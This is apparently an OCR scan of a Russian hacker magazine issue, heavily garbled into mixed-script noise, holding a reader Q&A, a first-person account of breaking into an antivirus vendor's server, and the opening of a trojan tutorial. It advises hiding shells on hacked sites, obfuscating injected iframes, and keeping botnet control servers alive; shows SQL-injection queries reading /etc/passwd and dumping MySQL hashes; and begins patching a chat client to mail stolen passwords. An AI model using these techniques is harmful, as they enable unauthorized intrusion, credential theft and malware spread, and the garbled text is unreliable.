іеЛШр^РіОЙЙР ПОСЛ ЕД Н ЕГО В 





і-Ьй 


іт 








Ж 








Ж 




Б 


1 


пВНтЕЯдЯ 


-іѵрромі 9ги 


ф 


льл 




□ ЪІ('Ч.Ги 'Логит 









Б ЗЛОМ 




Наск-Раа 



^О: НАПИСАЛ СМ5 И ДУМАЮ, СТОИТ ЛИ ДЕЛАТЬ ОБФУСКАЦИЮ 
КОДА? ЗАЗЕНДИТЬ? 

&0*А: Напомню, что обфускация — это запутывание кода программы, то есть 
приведение исходного текста или исполняемого кода к виду, сохраняюще- 
му функциональность программы, но затрудняющему анализ, понимание 
алгоритмов работы и модификацию при декомпиляции. Запутывание кода 
может осуществляться на уровне алгоритма, на уровне исходного текста, ас- 
семблерного текста. Для создания запутанного ассемблерного текста могут 
применяться специализированные компиляторы, использующие неочевид- 
ные или недокументированные возможности среды исполнения программы. 
Сейчас зенд обходится умельцами, а любые другие простенькие обфускато- 
ры не могут обеспечить достойный уровень кодирования, и код раскодиру- 
ется довольно быстро. Но от неподготовленных хакеров обфускация может 
помочь :). 

&О-0: НУ А НУЖНО ЛИ ДЕЛАТЬ ПРИВЯЗКУ СКРИПТОВ КХОСТУ? 

&0-А: Как правило, обнулевание.то есть отвязка скриптов отхоста, не 
представляет сложности. Привязка, как и обфускация, может защитить твои 
скрипты только отлюдей, совершенно незнающих веб-программирование. 

ВсК^СПАМ-БОТЫ, ОБХОДЯЩИЕ КАПЧУ НА МОЕМ ФОРУМЕ, СТАЛИ 
СИЛ ЬНО ДОПЕКАТЬ. ЧТО ДЕЛАТЬ? 

ІЮА: Способу генерации сарісН'и, которую не сможет обойти бот, стоило бы 
посвятить целую статью. Некоторые алгоритмы реально работающих капч 
можно найти в статье «Построение защищенной надписи» ( бНрУ/сарісба. 
ги/агбсіез/ѵізиаі ). 

Мы остановимся лишь на основных моментах. Во-первых, можно исполь- 
зовать аудиофайлы с записью какого-либо слова, которое при регистрации 
должен ввести пользователь. Во-вторых, можно задавать пользователю 
небольшие задачки вроде: «Сколько будет 1 5+1 2?». Есть и еще некоторые 
капчи, нотак или иначе все они могутбыть неэффективны. 

Если нетжелания самому создавать стойкие системы против ботов, то 
всегда можно воспользоваться уже готовыми и проверенными на деле. 
Например, капчами, генерируемыми на известных порталах. В этом случае 
мы вызываем, например, генерируемое сочетание символов со сторон- 
него сервера и просим ввести ихуже в своей системе регистрации, далее 
отправляем введенные пользователем символы серверу, на котором была 
сгенерина капча, и читаем ответтого сервера. 

ЕСТЬ ЛИ В ОРАКЛЕ ФУНКЦИЯ, АНАЛОГИЧНАЯ МУСКУЛЬНОЙ 
ЬОАО_РІЬЕИ? 

&С?”А: Нет, к сожалению, возможность загрузить файл отсутствует. 

^>ОіХОЧУ ВСТАВИТЬ КОД ПРОСТОГО ШЕЛЛА В СКРИПТЫ ВЗЛОМАН- 
НОГО САЙТА, НО ОПАСАЮСЬ, ЧТО АДМИН ПРОПАЛИТ ЭТО ДЕЛО. 

&с?”А: Если на сервере установлена и правильно сконфигурирована Ю5,то 
глупо прибегать к патчингу скриптов. Даже без систем обнаружения 



вторжений можно сравнить чексуммы, и факт изменения кода сразу же 
всплывет. Нуа если на взломанной машине нетЮБ’оки руки админист- 
ратора растут из неположенного для этого места, то хотя бы не поленись 
сменить дату изменения файла :). Для этого используем функцию Іоисб. 
Синтаксис: 

ЦоисЬ -С Год месяц день часы минуты файл 
Пример: 
зЪ# 1з -аі 

— гтлг— г--г-- 1 гооі: гооі: 4 2005-10-05 18:50 бііе.ххх 
зЪ# СоисЬ -1:2 00710090102 Еііе.ххх 

зЪ# 1з -аі 

— гѵ*7— г — г — 1 гооб гооі: 4 2007-10-09 01:02 бііе.ххх 

^О: ПОТИХОНЬКУ СТАЛ ВЛИВАТЬСЯ В ТЕМУ ВЗЛОМА ѴѴІ-РІ СЕТЕЙ, НО 
НЕ МОГУ ОПРЕДЕЛИТЬСЯ С ОБОРУДОВАНИЕМ. ЧТО КУПИТЬ: НОУТБУК 
ИЛИ КПК? 

&о*А: Кому что удобнее. На мой взгляд, идеальный вариант — это мобиль- 
ный ноутбук (то есть ноут небольших размеров, легкий, с электроемкой 
батареей] плюс КПК. КПК — для прочесывания местности наточки доступа 
и составления карты, а ноут — уже для целенаправленной атаки. 

Если брать что-то одно, то, конечно, КПКзначительно опережает ноутбук 
по эргономичности, но ведь главный фактор здесь — набор софта. А вотуже 
в этом вопросе, естественно, ноут существенно обходит своего младшего 
брата :). 

^>0: НУ А ЧТО ДЕЛАТЬ, ЕСЛИ НЕ МОГУ ПРАВИЛЬНО НАСТРОИТЬ ЖІ-РІ 
УТИЛИТЫ, ДРАЙВЕРЫ ПОД ЫЫІІХ? 

&0”А: Большинство из тех, кто настраивал ѴѴі-Рі под никсами, сталкива- 
лисьс различными проблемами. Это и отталкивает многих новичков от 
ѵѵагбгіѵіпд'а. 

Попробуй использовать специализированные І_іѵеС 0-дистрибутивы, в 
которых уже есть большой набор инструментария и драйверов. В качестве 
примера могу назвать ѴѴбах, Ргешу, Ы5Т. Также настоятельно рекомендую 
зайти на ресурс бир://тас1ѵѵКі.огд . 

^0: КАК КАЧЕСТВЕННО ЗАШИФРОВАТЬ ІРКАМЕ, КОТОРЫЙ Я ВСТАВ- 
ЛЯЮ В СТРАНИЦЫ, И НУЖНО ЛИ ЕГО ВООБЩЕ ШИФРОВАТЬ? 

&0"А: Шифровать свои фреймы нужно обязательно. Просечь новые строчки 
кода, тем более с ссылкой на неизвестный сервер, сможет любой админ. 
Если кто-то получит доступ к серверу, который взломал ты, то он обязатель- 
но убереттвой Тгате из кода, так как покупателям збеІІ/Йр нужны чистые, 
непоюзанные акаунты. 
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Нуа шифровать можно по-разному. Каквариант— использование НТМ1_- 
крипторов (к примеру, НТМІ_РгоІес1:ог]. Существуетонлайн-сервис НТМІ_ 
Епсосіег ( ИіфУ/собеЬоизе.сот/ѵѵеЬтаз^ег Іооіз/Ыті епсосіег ]. Для 
примера я взял такую строку: 

сіЕгате згс="]іЕЕр : / /шузегѵег» Ш-СІЦі^О Ъеід]іЦ=0></ 
іЕгате> 

После шифрования она приобрела следующий вид: 

<зсгірЕ Еуре= , 'СехЦ/даѵазсгірЦ , '>с1оситепЦ .ѵпгіЕе ( ' \ 
и003с\и0069\и0066\и0072 \и0061\и006сЗ.\и0065\и0020\ 
и0073 \и0072 ХиООбЗ Хи003сІ\и0022 \и0068\и0074\и0074\ 
и0070\и003а\и002Е\и002Е\и006сі\и0079\и0073 Хи0065\ 
и0072 Хи007б\и00б5\и0072 \и0022 \и0020\и0077 \и00б9\ 
и00б4\и0074\и00б8\и003й\и0030\и0020\и0068\и00б5\ 
и0069\и0067 \и0068\и0074\и003сІ\и0030\и003е\и003с\ 
и002Е\и0069\и0066\и0072 \и0061\и006сІЛи0065\и003е ' ) </ 
зсгірЕ> 

Чтобы проверить правильность кодирования, можно заюзать НТМІ_ 
йесосіег, который находится на том же ресурсе. Введя зашифрованный 
фрейм, я получил первоначальный вариантсвоего іігате. 

^>0: УЗНАЛ ЛОГИН И ПАСС ОТ МѴБСША, НО НЕ МОГУ ПРИКОННЕК- 
ТИТЬСЯ СО СВОЕГО КОМПА. ПОЧЕМУ? 

В конфиге мускула запрещеноудаленное подключение. Заливай 
скрипта-ля рЬрМуАбтіп и подключайся локально. 

ВоЧ^НЕ ЗНАЮ, ЧТО ДЕЛАТЬ: ПРИКРЫЛИ СЕРВЕР, КОТОРЫЙ УПРАВ- 
ЛЯЛ БОТНЕТОМ. 

Купи абузоустойчивый сервак. Используй децентрализованную 
систему управления ботами. Сделай управление с нескольких запасных 
серверов. Распределяй команды между несколькими главными ботами, с 
которых будут получать команды все остальные. Также сделай бэкап-сер- 
вер, и если главные боты умирают, то команды скачивают несколько других 
ботов, которые также становятся главными. Можно не ждать, пока кильнут- 
ся основные управляющие боты, и задействовать партиями других ботов. В 
общем, включи смекалку :). 

ВСКЗ: СЛЫШАЛ ПРО УТИЛИТЫ, КОТОРЫЕ НАЗЫВАЮТ 
Н.АЖРШ6ЕК’АМИ. ЧТО ЭТО ЗА ПРОГРАММЫ? 

Вс^А: Еіаѵѵбпдег’ы — это программы, позволяющие находить косяки в 
исходных кодах программ. Такие утилиты анализируютсорцы (сейчас су- 
ществуют Л пде г' ы, анализирующие Заѵа-, Регі-, РНР-, С/С++-, РуіЬоп-код) 
и составляют детальный отчет, где прописывают номера строк в коде, в ко- 
торых, по их мнению, может возникнуть ошибка (утечка памяти], уязвимость 
(переполнение буфера). 

ВСК^! ЧТО ТАКОЕ ЮАР-ИНЪЕКЦИИ? 

Во*А: Если говорить просто, это внедрение операторов в уязвимое 
приложение, которое передаетзапросы к службе ЕйАР. В этом случае все 
запросы от пользователя передаются по протоколу ЕйАР. Здесь, каки при 
обычной ЗОИ-инъекции, безопасность сервера зависит отфильтрации 
передаваемых от пользователя данных. Если нет должной фильтрации, то 
хакер может модифицировать ЕйАР-запрос. Чтобы не быть голословным, 
можно взять пример кода с комментариями из каталога классификаций уг- 
роз, составленного специалистами из ѴѴеЬ Арріісабоп Бесигйу Сопзогбит 
( Шр://ѵѵеЬарр5ес.ога ]. 



Ііпе 3 : <% 

Ііпе 4: Біт изегЫате 
Ііпе 5: Біт ЕіІЕег 
Біт ІсЗарОЬз 



" Ісіар . ехатріе " 
КедиезЕ . (ХіегуЗЕгіпд ( "изег " ) 



Ііпе б : 

Ііпе 7 : 

Ііпе 8 : СопзЕ ЬБАР_ЗЕКѴЕК = 

Ііпе 9 : 

Ііпе 10: изегЫате 
Ііпе 11 : 

Ііпе 12: іЕ ( изегЫаше = "" ) ЕЬеп 

Ііпе 13: Кезропзе .МгіЕе ( "<Ъ>Іпѵа1іс1 гедиезЕ . Ріеазе 
зресіЕу а ѵаіісі изег паше</Ъ><Ъг>" ) 

Ііпе 14: Кезропзе . Епсі ( ) 

Ііпе 15 : епсі ІЕ 
Ііпе 16 : 

Ііпе 17 : 

Ііпе 18: ЕіІЕег = " (иісІ=" + СЗЕг (изегЫате) + ") " " 
зеагсЫпд Еог ЕЬе изег епЕгу 
Ііпе 19 : 

Ііпе 2 0 : 

Ііпе 21: "СгеаЕіпд ЕЪе ЬБАР оЬ^есЕ апсі зеЕЕіпд ЕЪе Ъаз* 
ап 

Ііпе 22: ЗеЕ іаарОЬз = Зегѵег. 

СгеаЕеОЪзесЕ ( " ІРМогкзАЗР . ЬБАР" ) 

Ііпе 23: іаарОЬ д . ЗегѵегЫаше = ЬОАР_ЗЕКѴЕК 

Ііпе 24: ІсІарОЪ;] .БЫ = "ои=реор1е , ск^зріІаЪ, с!с=соіп" 

Ііпе 2 5 : 

Ііпе 26: "ЗеЕЕіпд ЕЪе зеагсЬ. ЕіІЕег 
Ііпе 27: ЫарОко . ЗеагсІіРіІЕег = ЕіІЕег 
Ііпе 2 8 : 

Ііпе 29: іаарОЬ д . ЗеагсЬ. 

Ііпе 3 0 : 

Ііпе 31: "ЗЬомйпд ЕЬе изег іпЕогшаЕіоп 
Ііпе 32: Шіііе іаарОЬ^ .ЫехЕРезиІЕ = 1 
Ііпе 33: Кезропзе .МгіЕе ( "<р>" ) 

Ііпе 34 : 

Ііпе 35: Кезропзе .ѴЬгіЕе ( "<Ь><и>ІІзег ІпЕогшаЕіоп Еог: 

+ іаарОЬ^ . АЕЕгѴаІие ( 0) + "</их/Ь><Ьг>") 

Ііпе 36: Еог і = 0 То ЫарОЪз . АЕЕгСоипЕ -1 

Ііпе 37: Кезропзе .МгіЕе ( "<Ь>" + ІсІарОЪз . АЕЕгТуре (і) 

+"</Ь>: " + іаарОЪз . АЕЕгѴаІие (і) + "<Ьг>" ) 

Ііпе 3 8 : ЫехЕ 

Ііпе 39: Кезропзе .МгіЕе ( "</р>" ) 

Ііпе 40 : Мепа 
Ііпе 41 : %> 

Ііпе 42: </Ьоау> 

Ііпе 43: </1іЕш1> 



Обрати внимание, что имя пользователя, полученное от клиента, прове- 
ряется на наличие пустого значения (строки 10-12). Если в переменной 
содержится какое-то значение, оно используется для инициализации 
переменной Еі Пег (строка 18). Полученное значение применяется для 
построения запроса к службе ЕйАР (строка 27), который исполняется в 
строке 29. 

В приведенном примере атакующий имеетполный контроль над запросом 
и получает его результаты от сервера (строки 32-40). 

Мы можем сделать следующий запрос: 

ЬЕЕр : // ехатріе /іаарзеагсЬ. азр?изег=* 



УЯЗВИМЫЙ КОД В этом случае серверу передается символ «*» в качестве параметра, 

Ііпе 0: <ЬЕт1> что приводит к формированию запроса с фильтром иісІ=*. Выпол- 

Ііпе 1 : <Ъосіу> нение запроса приводит к отображению всех объектов, имеющих 

Ііпе 2: <%@ Бапдиаде=ѴВЗсгірЕ %> атрибут иісі. 3-Л 
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АТАКА НА 



N0032 



ВТОРЖЕНИЕ НАСЕРВЕР ПОПУЛЯРНОГО АНТИВИРУСА 



В последнее время меня начали раздражать конференции по информационной безопас- 
ности, на которых половину времени зачитывают доклады представители различных 
антивирусных компаний. Подумай сам, кто будет использовать коммерческий продукт 
без серьезной необходимости? Не спорю, необходимость есть, вот только порой она силь- 
но преувеличена. Тем не менее ведущие антивирусные лаборатории наращивают шта- 
ты своих специалистов, пытаясь поглотить рынок и частенько забывая о собственной 
безопасности. О чем это я? Да о свеженьком взломе сервера одного из представительств 
популярного антивируса N0032. Думаю, ты уже догадался, что речь в статье пойдет 
именно о нем. 



г 5ТАКТ І.ЕѴЕІ. 

Одним из вечеров, бродя по Сети и занимаясь рутинной работой, я в 
очередной раз заметил на десктопе всплывающее окно N0032 с предло- 
жением об апдейте баз. Нажав на кнопку Уев, я обнаружил, что аккаунт, 
который ранее был любезно предоставлен одним из моих знакомых, 
оказался залоченным. Выругавшись, я полез в закладки браузера, чтобы 
отыскать ссылку на позабытый ресурс с халявными обновлениями для 



антивиря, но и тут меня ждал облом — линка и след простыл. Недолго 
думая я набрал адрес Гугла, вбил нехитрый запрос и принялся про- 
сматривать результаты поиска. Десятки форумов различной тематики, 
хак/варез-порталы — все это мигом хлынуло в мою Оперу, однако за- 
ниматься этим совершенно не входило в мои планы, поэтому, отыскав 
нужный линк, я свернул этотувлекательный процесс и перешел по 
найденному ІІВІ_. 
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Увы, но вместо свежих антивирусных баз меня поджидал реди- 
рект, который вел в направлении ѵѵѵѵѵѵ.езеБЬа . Быть может, это 
событиетак и осталось бы незамеченным, если бы не одно но. 
Указанный ресурс являлся официальным сайтом болгарского 
представительства N0032. Злая шутка или ирония судьбы? 
Этот вопрос возник в моей голове и тут же пропал, зато вместо 
него появилось непреодолимоежелание одним глазком 
взглянуть на сервер антивирусной компании. Изнутри. 

Первым делом я убедился, что оба домена — ѵѵѵѵѵѵ.езеБЬа и 
ѵѵѵѵѵѵ.посІ32.Ьа — располагаются на одном сервере. Об этом 
свидетельствовали показания утилы пзіоокир, определившей 
ІР-адрес болгарского дедика: 89.25.53.73. Что ж, можно было 
приступать к работе, тем более что я успел заметить РНР'шный 
движок ресурса :). Погуляв по сайту, я наткнулся на админку, 
располагающуюся в стандартном каталоге — /абтіп. Каки сле- 
довало ожидать, все входящие данные строго фильтровались. Этот 
факт меня нисколько неудивил, а лишь подтвердил, что на быстрый 
взлом рассчитывать бесполезно (интересно, а кто на него надеял- 
ся? :)). Тем временем первая зацепка оказаласьу меня в руках: 



Тогда я обратил внимание на форум: что-то подсказывало 
мне, что пасс пригодится именнотам. Просмотрев профили 
юзеров, я выделил среди прочих админа с загадочным ником 
гооі :). Несомненно, админ форума был ярым линуксоидом; 
окончательно я убедился в этом, когда успешно залогинился 
под его аккаунтом: гооБѴтОсІЬ. В радостном порыве я метнулся 
кадминке, чтобы попробовать добытую парулогин/пароль и 
там, но на этот раз мне не повезло, и я вынужден был вернуться 
на форум. 

Но у меня оставался еще один шанс — залить шелл через 
админку форума, благо движок борды оказался печаль- 
но изветным рЬрЬЬ :). Для этого мне требовалось найти 
полный путь к каталогу форума, после чего сделать бэкап 
базы, внести в него пару «корректировок» и замутить вос- 
становление БД через всю туже админку рЬрЬЬ. Идея была 
проста и заманчива, воттолько версия форума оказалась 
пропатченной дальше некуда, в результате чего ни один из 
известных баговтакинепомог вызвать ошибку с рас- 
крытием путей установочных каталогов. Я призадумался. 
Ситуация все больше походила на тупиковую, и нужно было 
срочно пересматривать свои действия, но время, прове- 
денное за взломом, давало о себе знать, и силы постепенно 
покидали меня. За окном уже давно рассвело, и я принял 
решение отправиться спать, предварительно закатав дамп 
базы форума (на всякий пожарный :)). 

^ БЕУЕБЫР 

Проснувшись далеко за полдень и наскоро поев, я прикон- 
нектился к Сети, где меня ждал Сюрприз. Да-да, именно вот 
так — с большой буквы: Сюрприз :). Нет, админ не пропатчил 
баги не лишил меня возможности админить форум, отнюдь. 

А вот некоторые из стыренных ночью мускул-хэшей успешно 
сбрутились, пока я спал :). Таким образом, я получил несколько 
аккаунтов к БД на сервере N0032: 



ЬББр : / / Ѵ7Ѵ7Ѵ7 . ѳзѳБ . Ъд / шаіп . рЪр?і(3— 3 8&ѵігиз Ю— - 1 



Диагноз был категоричен — слепой БОБ-инъектс возможностью 
лечения. Каквыяснилось, на сервере крутилась МуБОБ версии 
4.0.24, а прав юзера в базе хватало на доступ к тузді.изег: 



ЪогсЗетдг : МеВ_Ра55 
р!ірЬЬ2 : ТшО(ІЬВ 
рЪрЬЪ : ЬБпОВ 
рЪрпосЗ: ЙпОсЗрНБ 



/«ѵ 







> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 




/«\ 



> ІП^О 

Пробуй всевозмож- 
ные варианты и ни- 
когда не сдавайся. 

Не забывай про- 
верять стандартно 
установленный на 
сервере софт, как, 
например, в моем 
случае рЬртуасІтіп. 



ЪББр: / /ѵтѵлѵ . езѳБ . Ьд/таіп . рЪр?ісІ=3 8&ѵігизІВ— - 1 
+ипіоп+а11+зе1есБ+1 , 2 , сопсаБ (изег , сЬаг (58) ,р 
аззѵгогсі, сЪаг ( 58 ) , БюзБ) , 4 , 5 , 6 , 7 , 8+бгот+туздІ . 
изег+/* 

Какты знаешь, в мускуле ниже пятой версии все пассы поль- 
зователей хранятся в МуБОБ-хэшах, которые в 50% случаев 
без труда поддаются бруту. На этот раз мой хэш-улов состоял 
из более чем десятка аккаунтов, самые аппетитные из которых 
имели следующий вид (данные частично искажены по понят- 
ным причинам): 

гооБ : 44ЬЗе5527аБ37974 : ІосаІІіозБ 
гооБ : 75047(і7Бб4а1ѵе95 :ѵѵеЪ 
рЪрпосЗ: 12Б6с0а1912е07<34 : ІосаІЬозБ 
БюгсЗетдг : 75047с37Б64а1ѵе95 : % 
рЬрЬЬ: 73ЬЗ бЬ216Б8(Зе074 : ІосаІІіозБ 
р1ірЬЬ2 : 057(342 457 82 с1<ЗБ7 : ІосаІІіозБ 

Несколько удивляло наличие двух рутов, хэши которых 
вместе с остальными моментально отправились на 
брут. Результат не заставил себя долго ждать, и через 
несколько минут один из паролей порадовал мой взор 
— ѴтОсІЬ. Воттолько ни к админке, ни кББН он не под- 
ходил. 



Но еще большую радость я испытал, когда мой взгляд пере- 
местился на рут-хэши. Дело в том, что один из них полностью 
совпадал с хэшем пароля пользователя Ьогсіетдг: 

гооБ : 75047(37 Б64а1ѵе95 
Ъогсіетдг : 75047(37 І:64а1ѵе95 



Содержимое Ьозіз — как на ладони :) 




N0035 

*■*!■*>* 




і кі*:: 
м 

Г ДГЬ-^-Я 



Ц71І1І ютго'дегапійДІ л и Ч 

ЙВ '■«.* Ч ЯЙ 61 Я .4 ДОТШІ ЛИК Ц^ІІНЧ 

№» и >1 дя»* іі чипа (ч дм**, и ;< п іче» ч 

тао * т >ч ч^счгучіЧгніі ь * яіМЫр х и і -.:-т I 

ГМ і н.4 

ГПОІЛШПІ Г. - 1 рЛ- и; і і ІГІ- 
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Это означало лишь одно — у меня в руках был заветный акк: 
гооД :МеВ_Ра5з 

Но и здесь не все прошло гладко: пасс не подходил ни на 55Н, ни на РТР, 
ни на основную админку сайта. Тогда я зааплоадил Му50І_-клиентот Р5Т 
на один из своих поломанных ресурсов и попробовал подключиться кбазе 
удаленно: 

ЬрЦр : / / тт . ххх . сот/ ітадез / зді . рЬр? з=у&1одіп=Ьогс!етдг&р 
аззж!=ДОеВ_Ра38&зегѵег=89 .25.53 . 73&рогД=3306 

«Почему Ьогбетд г, а не гооі?» — спросишьты? Просто у юзера Ьогбетдг 
в поле Ьозі: стоял заветный символ «%» (согласно данным из тузді.изег). 
Однако все мои старания были тщетны — вместо доступа к БД я лицезрел 
еггог, злой рок неотступно следовал за мной. От безысходности своего 
положения я стал теребить уже заюзанный 50І_-инъекти вдругсообразил, 
что совершенно забыл проверить наличие прав б1е_ргіѵ. Я наскоро сфор- 
мировал кверю: 

ЬрЦрз : / /ѵ'Тѵш.пос132 .Ьд/таіп.рЬр?іс1=38&ѵігизІВ=-1+ипіоп+а 
11+зеІесД+І ,2,3,4, ІоасЦЕіІе ( ' / еЬс/равзѵгсі/ ) ,6,7,8+/* 

И в качестве ответа она вернула пустую страницу. Тогда я смело заюзал 
сЬаг(), несколько видоизменивзапрос кбазе: 

ЬЬРрз : //пос132 .Ъд/таіп.рЬр?і(і=38&ѵігизІВ=-1+ипіоп+а11+з 
еІесД+1 ,2,3,4, 1оа(і_Ті1е (сЬаг (47,101,116,99,47,112,97,1 
15,115,119,100) ) ,6,7,8+/* 

К моему удивлению, содержимое раззѵѵсі висело в окне моего браузера: 

гооЬ : х : 0 : 0 : гооб : /гооЦ : /Ьіп/ЬазЪ. 
сІаетоп:х: 1:1: Ьаетоп: /изг/зЫп: /Ьіп/зЬ. 

Ьіп : х : 2 : 2 : Ьіп : /Ьіп : /Ьіп/ зЬ 

зуз :х: 3 : 3 : зуз : /сіеѵ: /Ьіп/зЬ 

зупс :х: 4 : 65534 : зупс : /Ьіп: /Ьіп/зупс 

датез :х: 5 : 60 : дашез : /изг/дашез : /Ьіп/зЬ. 

шап:х: 6 : 12 :тап: /ѵаг /сасЬе/тап : /Ьіп/зЬ. 

1р : х : 7 : 7 : 1р : /ѵаг/ зрооі /Ірсі: /Ьіп/зЬ 
шаіі :х: 8 : 8 :таі1 : /ѵаг/таіі : /Ьіп/зЬ 
пемз : х : 9 : 9 : пемз : /ѵаг / зрооі /пемз : /Ьіп/зЬ 
ииср:х: 10 : 10 :ииср: /ѵаг/ зрооі /ииср : /Ьіп/зЬ 
ргоху :х: 13 : 13 :ргоху : /Ьіп: /Ьіп/зЬ 



Что ж, следующим логичным действием было бы чтение сорцов движка 
ресурса и всевозможных конфигов. Я решил начать с Апача и тут же обло- 
мался — найти его конфигоказалось не так-то легко. Тогда было решено 
редиректить свою активность на определение пути до корня веб-каталога. 
Покопавшись в /еіс/раззѵѵсі, я выудил две любопытные записи: 



ѵго7Ѵ7-сіаЬа:х:33 :33 :ѵпют7-сІаЬа: /ѵаг /ѵіѵм: /Ьіп/зЬ 
ѵ^еЬ:х: 1002:0: , , , : /ѵаг /тт: /Ьіп/ЬазЬ 

Вероятно, первая часть пути имела вид/ѵаг/ѵѵѵѵѵѵ, но, что было внутри, 
оставалось загадкой. Пофантазировав, я выделил наиболее реальные 
варианты: 

риЫіс_ЪЬт1 

ЬДсІосз 

ЬДтІ 

риЬ 

ѵдѵѵ7_риЬ 

\л7ѴЛл7_]Щт1 



Забегая вперед, скажу, что ни один из них не дал положительного 
результата. Поковыряв баг еще с час, я приуныл. Без знания пути 
до веб-каталога дальнейшее осуществление взлома накрывалось, 
да и инфу в каталогах юзеров нащупать не удавалось. Обидно было 
останавливаться, не дойдя до финишной черты. Запустив сканиро- 
вание веб-директорий, я надеялся найти рбртуасітіп или каталоги 
с неправильно выставленными ч мода ми. Но, увы, не повезло мне и 
здесь. Тогда я машинально полез в файл /еІс/ЬозІз и обнаружил там 
любопытную запись: 



ІосаІЬозД . Іосаісіотаіп ІосаІЬозЬ 

89.25.53.73 ѵ/еЬ . посЗЗ 2 . Ьд ѵ/еЬ 

89.25.53.74 рагДпегз .пос132 .Ьд рагДпегз 

89.25.53.71 даРеѵ^ау .по(132 .ЬддаДеѵ^ау 

89.25.53.72 зДабз .поЬ32 .Ьд зРабз 



Обрати внимание на поддомен ѵ\/еЬ.посІ32.Ьд. Перейдя по адресу Ыір:/Ал/еЬ. 
пос!32.Ьа . я попал на тестовую страницу Апача :). Скрестив пальцы, я вбил в 
адресной строке браузера линк: 



ЬЦЦр: //У7еЬ.пос132 . Ьд/рЬршуабшіп/ 

И увидел установленный и готовый к работе рЬрМуАсІтіп! Победа была за 
мной! Уже через пару минут я вовсю орудовал в базе (используя обручен- 
ные пассы :)). Что было внутри, не скажу — военная тайна. Важно одно 
— помимо доступа на чтение файлов на сервере и админки форума, я имел 
полноценный доступ к БД антивирусной конторы :]. 

^ ЕЫй ОР САМЕ 

Вдоволь наигравшись с базой и от души поглумившись над бол- 
гарским представительством N0032, я почистил хистори Оперы и 
закрыл браузер. Запустив ОіЖоок и прикинув текст письма, я черканул 
несколько строк админу ресурса с указанием на имеющиеся баги. 
Задумавшись я уставился в монитор, и лишьтолько вновь всплывшее 
окошко любимого антивиря с предложением об апдейте баз вернуло 
меня к реальности :). ц-ц 
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Разведение Интернета в домашних условиях 
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ловля 

НАЖИВЦА 



ЗАРАЖЕННАЯ НАЖИВКА ПРОТИВ РЫБАКОВ 



Ни для кого не секрет, что в нашей стране все очень любят халяву. Одним из видов халя- 
вы является рыбалка. И речь идет не о той рыбалке, которая с удочкой у пруда, а о той, 
когда сидишь за компьютером и смотришь, как твоя спутниковая тарелка ловит фай- 
лы, падающие со спутника. Таких «рыбаков» в последнее время развелось очень много. 
Движущая ими жажда халявы сыграет нам на руку и поможет впарить собственноручно 
написанного трояна. 



з вышесказанного, думаю, понятно, чем мы сегодня займемся. 
Мы самостоятельно внедрим в приложение-жертву неболь- 
шого троянца и распространим его (в смысле приложение). Но 
для распространения мы не будем использовать почту или по- 
ломанные сайты, а заюзаем «спутниковую рыбалку». Спутниковая рыбалка 
уже освещалась в одном из номеров][,такчто поднимай подшивку. 

Общий план дальнейших действий следующий: 

1) подготавливаем наживку, 



2) распространяем наживку, 

3) взвешиваем улов. 

г ПОДГОТОВКА НАЖИВКИ 

В качестве наживки я взял всем известного ОІР Виіісі 8020 (да простят 
меня разработчики). Можно, конечно, было выбрать какую-нибудь другую 
программу, например ІМоІерасІ, но врядли большое количество человек, 
поймав Ыоіерасі, станет ставить его себе на компьютер :). Да и блокнот, 




► 058 



ХАКЕР 10 /106/ 07 








1 1 



* «НВ 



.-иль І. лй_ 



•ЩГіГІІИ И ШВ I 



'^_1 1 іТ ШЯЯШ 
' *■ іі ХИ» 

т і.'Л ш ІІі, 

Т* I" "Г І*ТІ С І~ШГ| 





*И*і 


ІІ II 






■ ч 




Ы# 


ч#ч» 


■ч 




МЯ 


■РЧ 


■1 




р* 


К№ 


ІІ* 




■ и. 




ІИ 


Гчг 


ІІ# 


■ш 


■■ 


■ V 


ыи 




м» 


■н 


II# 




ЧЧ 



Нашулов 



.■ м пліі .і-11 
II Ш> 4ѴП I. _ Н" 

И‘.И И ■ Ій , ПІ ІІ * Щ ІІ4ІІП вл11,щ ІК17. 3 1 и .іи 1‘> I 

шут-11 досін 

И. .<4 '.'ЛН І.-лч 1 , ІіГі'ЛІ І, 

^рЛ'ііѴМ; 1 іш^цѴ і ініг- ■ 

Е04 1ЛСРрсЗЙ1л:п(» 

ні Г іШизкім^иів - 

.! 35 Гм і ! >«■ 1 1 1. і г л 1 і и ч □ шг'гг-гійгеі 

Нй I Г. ГНОРІГ пигиялкпв и лпчІРИл I Я . лі 
ПК 

ІВДІ7Т ТО г м мі^-тпчім Иг-і* I ІТМ-і і 1 . пі 

;:‘. и іЧс ч: о мт е-.і 
1*1 го 

□ ^4 Епсек іикі-рчв. впгі.іга ѵііі» оет * Лпр Ьи 11с <11 

іі к^ии ■ Г 

р*,й ок ічі ] иѵя4-тмнгі-ш 
ИИТ 

рл-Ч паііІ . пя іі _ пі і: Іизал', с ипіі гс. ? і а,і 



Процесс общения с 5МТР-сервером 



0064АЕС7 МОѴ ВУТЕ РТК БЗ : [ЕВХ+397] , 1 
0064АЕСЕ МОѴ ЕАХ, БЖЖБ РТК БЗ : [69С080] 
0064АЕБЗ МОѴ ЕАХ, БЖЖБ РТК БЗ : [ЕАХ] 



который просится в интернет, — это как-то странно. 

По выбору наживки ты, наверное, уже догадался, что мы будем воровать 
пароли отІССІ (думаю, для примера этого будет вполне достаточно). Для 
этого необходимо добавить в ОІР дополнительный функционал, задачей 
которого будет отправка пары логин/пароль кнам на почтовый ящик. 
Реализуем это следующим образом. В сам ОІР внедрим код, загружающий 
нашу 0І_І_ и передающий одной из ее функций (назовем ее ргосі ) в качестве 
параметров парулогин/пароль. 0І_1_, в свою очередь, отправитполученные 
данные к нам на почтовый ящик. Задачи поставлены, можно переходить к 
их решению... 

Первое, что мы должны сделать, — это найти место, где из есІіСов считы- 
ваются введенные пользователем персональные данные. Таким образом 
мы облегчим себе задачу по добыванию персональной информации и нам 
не придется разбираться в алгоритме шифрования паролей к ІСО, которые 
лежат на диске. Поэтому открываем ОІР в ОІІуОЬд. 

Необходимо немного осмотреться, поэтомужмем <Р9> и запускаем 
приложение. Если поле «Пароль» оставить пустым и нажать на кнопку 
«Подключиться», то выскочит МеззадеВох, который нам и поможет :). 
Поставим на него бряк (Ьрх МеззадеВохА). Еще раз пробуем подклю- 
читься и прерываемся по адресу 0х00487Е42 (САЕИ <Л7ІР.&изег32. 
МеззадеВохА>). Нажимаем < СЕгІ- Р9 > , чтобы перейти в конец функции 
